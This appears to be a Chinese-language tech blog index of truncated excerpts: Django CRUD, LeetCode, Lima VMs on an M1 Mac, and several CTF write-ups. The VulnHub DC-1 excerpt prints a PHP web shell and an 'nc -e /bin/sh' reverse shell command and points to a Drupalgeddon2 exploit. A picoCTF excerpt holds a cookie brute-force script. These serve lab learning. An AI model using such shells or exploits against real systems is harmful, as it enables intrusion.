Django 資料庫CRUD
新增資料(Create)def Create(request):
Name = 'Andy'
Sex = 'M'
Birthday = '2022-02-02'
Email = 'Andy@gmail.com'
Phone = '0987654321'
Addr = '新北市三重區xx路xx號x樓'
Class = '301'
ClassOfficers = '班長'
data = student.objects.create(Name=Name, Sex=Sex, Birthday=Birthday, Email=Email,Phone=Phone, Addr=Addr,Class=Class,
ClassOfficers=ClassOfficers)
data.save() #寫入資料庫
return render(request,"home.html",locals())
讀取資料(Read)def Read(request):
# 取得student所有資料
...
Django 資料庫建立、註冊
1. 建立資料庫模型編輯models.py
from django.db import models
class student(models.Model):
Name = models.CharField(max_length=20, null=False)
Sex = models.CharField(max_length=2, default='M', null=False)
Birthday = models.DateField(null=False)
Email = models.EmailField(max_length=100, blank=True, default='')
Phone = models.CharField(max_length=50, blank=True, default='')
Addr = models.CharField(max_length=255,blank=True, default='')
Class = models.CharField(max_length=255,blank= ...
LeetCode[202] Happy Number
1. 題目Write an algorithm to determine if a number is “happy”.
A happy number is a number defined by the following process: Starting with any positive integer, replace the number by the sum of the squares of its digits, and repeat the process until the number equals 1 (where it will stay), or it loops endlessly in a cycle which does not include 1. Those numbers for which this process ends in 1 are happy numbers.
Example:
Input: 19
Output: true
Explanation:
1 * 1 + 9 * 9 = 82
8 * 8 + 2 * 2 & ...
M1 Mac 運行x86機器的簡單方法
前言換了人生中第一台macbook,但是卻是arm架構的,很多軟體還不是很支援,試了用qemu裝vm也試了rdp port-forwaring 回去,但前者不知道為什麼很耗電而後者很吃網路的狀況,最後!我找到了我的救星那就是Lima!
Lima-VM是一個可以使用qemu模擬x86的開源軟體且非常輕量
Lima Github Repo
安裝方法使用brew安裝brew install lima
撰寫config檔案(yaml格式)這邊直接上我的配置,新增檔案 ubuntu-22_04.yaml
# if using specific environment, add `arch` here to specify the architecture
arch: "x86_64"
# ubuntu-22.04.yaml example from lima official (here is all the same as the official example)
images:
# Try to use release-yyyyMMdd image if available. Note ...
VulnHub-DC1
尋找DC-1靶機$ nmap 10.0.2.4 -A -p-
發現有port 80 -> 直接瀏覽網頁
使用wappalyzer得知使用Drupal 7
搜尋已知Exploit來取得RCE
CVE-2018-7600
Exploit:https://github.com/dreadlocked/Drupalgeddon2
ls -> 發現flag1
發現有shell.php<?php if( isset( $_REQUEST['c'])) { system( $_REQUEST['c'] . ' 2>&1 ');}>
使用nc 監聽取回reverse shell(python pty)http://10.0.2.4/shell.php?c=nc%20-e%20%2Fbin%2Fsh%2010.0.2.15%208080
nc -e /bin/sh 10.0.2.15 8080
python -c "import pty;pty.spawn('/ ...
picoCTF Cookies [40points]
[Web Exploitation] Cookies - 40points初始畫面
輸入snickerdoodle,發現進入畫面不一樣
嘗試撰寫暴力破解腳本
#!/bin/python3
import requests
for i in range(25):
cookie = 'name={}'.format(i)
headers = {'Cookie':cookie}
r = requests.get('http://mercury.picoctf.net:<port>/check', headers=headers)
if (r.status_code == 200) and ('picoCTF' in r.text):
print(r.text)
取得FLAG
FLAG:picoCTF{3v3ry1_l0v3s_c00k135_064663be}
彩色的Ascii Banner
1. 安裝apt install figlet lolcat
2.下載字形檔案figlet-fonts
git clone https://github.com/xero/figlet-fonts.git
3.複製到figlet目錄
4.使用方式
5.加入到~/.bashrc
6.完成
pwnable start [100pt]
看保護機制
checksec start
看源碼
objdump -d -M intel start
start: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 54 push esp
8048061: 68 9d 80 04 08 push 0x804809d
8048066: 31 c0 xor eax,eax
8048068: 31 db xor ebx,ebx
804806a: 31 c9 xor ecx,ecx
804806c: 31 d2 xor edx,edx
804806e: 68 43 54 46 3a push 0x3a465443
8048073: 68 74 68 65 20 ...
picoCTF GET aHEAD [50 points]
DescriptionFind the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/
Solution看HTML發現有兩種請求方式
GET 和 POST
<div class="col-md-6">
<div class="panel panel-primary" style="margin-top:50px">
<div class="panel-heading">
<h3 class="panel-title" style="color:red">Red</h3>
</div>
<div class="panel-body">
<form action="index.php" method="GET">
<input type="submit" ...